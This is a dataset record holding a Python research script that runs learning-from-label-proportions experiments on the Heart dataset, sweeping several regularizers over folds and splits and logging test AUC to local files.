| 0
| 0.714286
| 0
| 0
| 0.130827
| 0.021001
| 0
| 0
| 0
| 0
| 0.276398
| 1
| 0.10559
| false
| 0
| 0.012422
| 0
| 0.124224
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b810d7b14e79d097babae397b040fe60dce893e6
| 27,340
|
py
|
Python
|
On_Combining_Bags_to_Better_Learn_from_Label_Proportions/Code/PythCode/heartloops.py
|
gunpowder78/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 1
|
2022-03-13T21:48:52.000Z
|
2022-03-13T21:48:52.000Z
|
On_Combining_Bags_to_Better_Learn_from_Label_Proportions/Code/PythCode/heartloops.py
|
gunpowder78/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | null | null | null |
On_Combining_Bags_to_Better_Learn_from_Label_Proportions/Code/PythCode/heartloops.py
|
gunpowder78/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 1
|
2022-03-30T07:20:29.000Z
|
2022-03-30T07:20:29.000Z
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/python
#
# Copyright 2021 The On Combining Bags to Better Learn from
# Label Proportions Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""LMMCM Loops for Heart Dataset."""
from pathlib import Path # pylint: disable=g-importing-member
import random
from models.kernel_model import * # pylint: disable=wildcard-import
import pandas as pd
import utils.bag_utils
import utils.data_utils
from utils.model_utils import * # pylint: disable=wildcard-import
# Seeded numpy Generator (seed 6737749) used to draw per-iteration
# `random`/`numpy` seeds for the first regularizer sweep below.
rng = np.random.default_rng(6737749)  # pylint: disable=undefined-variable
# Resolve ../../Data relative to this file so the script works from any cwd.
path_to_root_data_dir = (Path(__file__).parent / "../../Data/").resolve()
root_for_experiments = str(path_to_root_data_dir) + "/"
dataset_name = "Heart"
# Feature columns are named x.1 .. x.(NUM_FEATURES-1), plus a "constant" column.
NUM_FEATURES = 14
name_dir = root_for_experiments + dataset_name + "/"
# Regularizer for the first sweep; later sweeps rebind these two values.
regularizer_param = 1e0
regularizer_param_string = "1e0"
class Helperdict(dict):
  """Dict subclass that is hashable.

  Equality and the hash are derived from a canonical, key-sorted tuple of
  the mapping's items, so two Helperdicts with the same contents compare
  equal regardless of insertion order.
  """

  def __key(self):
    # Canonical representation: (key, value) pairs ordered by key.
    ordered_keys = sorted(self)
    return tuple((name, self[name]) for name in ordered_keys)

  def __hash__(self):
    return hash(self.__key())

  def __eq__(self, other):
    # NOTE: `other` is expected to be another Helperdict (name-mangled access).
    return self.__key() == other.__key()  # pylint: disable=protected-access
def _run_lmmcm_experiments(rng_seed, regularizer, regularizer_string):
  """Run the LMMCM kernel-model sweep for one regularizer setting.

  For every clustering method (1-8; method 5 is skipped), fold (1-5) and
  split (1-5): load the bagged train/test CSVs, fit a KernelizedMethod on
  the bag label proportions, and append the test AUC as one CSV row to a
  per-method output file.

  This replaces five byte-identical copy-pasted loops from the original
  script; each call reproduces one of them exactly, including the order in
  which seeds are drawn from the generator.

  Args:
    rng_seed: Seed for the numpy Generator that supplies per-iteration
      `random`/`numpy` seeds.
    regularizer: Regularizer weight passed to KernelizedMethod.
    regularizer_string: String form of the regularizer, used in output file
      names and log lines.
  """
  rng = np.random.default_rng(rng_seed)  # pylint: disable=undefined-variable
  for cluster_bags_method in range(1, 9):
    # Methods 6-8 live in on-disk directories 5-7 (method 5 is skipped below).
    if cluster_bags_method > 5:
      cluster_bags_method_to_use = cluster_bags_method - 1
    else:
      cluster_bags_method_to_use = cluster_bags_method
    outfile = (
        name_dir + dataset_name + "_" + regularizer_string +
        "_MutConOutputClusterBags_" + str(cluster_bags_method_to_use))
    for foldnumber in range(1, 6):
      folddir = name_dir + "Fold_" + str(foldnumber) + "/"
      for splitnumber in range(1, 6):
        splitdir = folddir + "Split_" + str(splitnumber) + "/"
        testfile = (
            splitdir + dataset_name + "_" + str(foldnumber) + "_" +
            str(splitnumber) + "-test.csv")
        cluster_dir = (
            splitdir + "ClusterBags_" + str(cluster_bags_method_to_use) + "/")
        trainfile = cluster_dir + "full_train.csv"
        # Seeds are drawn BEFORE the method-5 skip so the generator's stream
        # matches the original script's per-iteration consumption exactly.
        random_seed = rng.integers(low=1000000, size=1)[0]
        numpy_seed = rng.integers(low=1000000, size=1)[0]
        if cluster_bags_method == 5:
          continue
        random.seed(random_seed)
        np.random.seed(numpy_seed)  # pylint: disable=undefined-variable
        print()
        print("*********starting************")
        print(dataset_name + "_" + regularizer_string + "_Fold_" +
              str(foldnumber) + "_Split_" + str(splitnumber))
        print("random_seed = ", random_seed)
        print("numpy_seed = ", numpy_seed)
        # Feature columns x.1 .. x.(NUM_FEATURES-1), plus the bias column.
        list_of_features = ["x." + str(i) for i in range(1, NUM_FEATURES)]
        list_of_features.append("constant")
        full_train_df = pd.read_csv(trainfile)
        test_df = pd.read_csv(testfile)
        num_bags = len(pd.unique(full_train_df["bag"]))
        if num_bags % 2 == 1:
          # An odd bag count is rebalanced by dropping one bag at random.
          bag_to_drop = random.choice(pd.unique(full_train_df["bag"]))
          full_train_df = full_train_df[
              full_train_df["bag"] != bag_to_drop].reset_index()
        train_X = full_train_df[list_of_features].copy()  # pylint: disable=invalid-name
        train_y = full_train_df["label"].copy()
        test_X = test_df[list_of_features].copy()  # pylint: disable=invalid-name
        test_y = test_df["label"].copy()
        bag_id = full_train_df["bag"].to_numpy()
        cont_col = list_of_features
        prop_dict, size_dict = utils.bag_utils.compute_label_proportion(
            train_y, bag_id)
        # Debug dump of the loaded frames (same format as the original logs).
        for label, frame in (("train_X", train_X), ("train_y", train_y),
                             ("test_X", test_X), ("test_y", test_y)):
          print(label)
          print(frame.head(4).to_string())
          print(frame.tail(4).to_string())
          print()
        print("bag_id")
        print(bag_id)
        print()
        # cont_col was printed twice in the original script; kept for
        # byte-identical log output.
        print("cont_col")
        print(cont_col)
        print()
        print("cont_col")
        print(cont_col)
        print()
        print("prop_dict")
        print(prop_dict)
        print()
        print("size_dict")
        print(size_dict)
        # Set up model and training parameters.
        kernel_params = {
            "kernel": "rbf",
            "gamma": "scale",
            "loss": LogisticLoss  # pylint: disable=undefined-variable
        }
        # Helperdict is hashable, which the options tuple relies on.
        train_options = ("L-BFGS-B",
                         Helperdict({
                             "ftol": 1e-5,
                             "maxiter": 100,
                             "maxcor": 80
                         }))
        train_params = {"method": train_options, "exclusion_param": 0}
        model = KernelizedMethod(  # pylint: disable=undefined-variable
            **kernel_params, regularizer=regularizer)
        train_X_engineered, test_X_engineered = (  # pylint: disable=invalid-name
            utils.data_utils.feature_engineering_cont(train_X, test_X,
                                                      cont_col))
        print()
        print("train_X_engineered")
        print(train_X_engineered)
        print(train_X_engineered.shape)
        print()
        print("test_X_engineered")
        print(test_X_engineered)
        print(test_X_engineered.shape)
        model.fit(train_X_engineered, test_X_engineered, test_y, bag_id,
                  prop_dict, size_dict, **train_params)
        # Retained from the original script; the prediction itself is unused.
        model.predict(test_X_engineered)
        area, _, _, _ = model.get_roc(test_X_engineered, test_y)
        print("auc = ", area)
        results_string = (
            dataset_name + "_" + regularizer_string + ", " +
            str(cluster_bags_method_to_use) + ", " + str(splitnumber) + ", " +
            str(foldnumber) + ", " + str(area) + "\n")
        with open(outfile, "a") as fileto_append:
          fileto_append.write(results_string)


# One call per regularizer in the sweep. Each call reseeds its own generator
# with the seed the original script used for that setting, so all random
# streams — and therefore all results — are reproduced exactly.
_run_lmmcm_experiments(6737749, 1e0, "1e0")
_run_lmmcm_experiments(74537984, 1e-1, "1e-1")
_run_lmmcm_experiments(938374, 1e-2, "1e-2")
_run_lmmcm_experiments(2538482, 1e-3, "1e-3")
_run_lmmcm_experiments(948732, 1e-4, "1e-4")
| 28.870116
| 124
| 0.611339
| 3,354
| 27,340
| 4.640429
| 0.073942
| 0.042406
| 0.054613
| 0.03598
| 0.947314
| 0.93954
| 0.93954
| 0.927204
| 0.927204
| 0.927204
| 0
| 0.015141
| 0.268032
| 27,340
| 946
| 125
| 28.900634
| 0.762592
| 0.100585
| 0
| 0.92775
| 0
| 0
| 0.076631
| 0.011023
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004926
| false
| 0
| 0.011494
| 0.004926
| 0.022989
| 0.361248
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.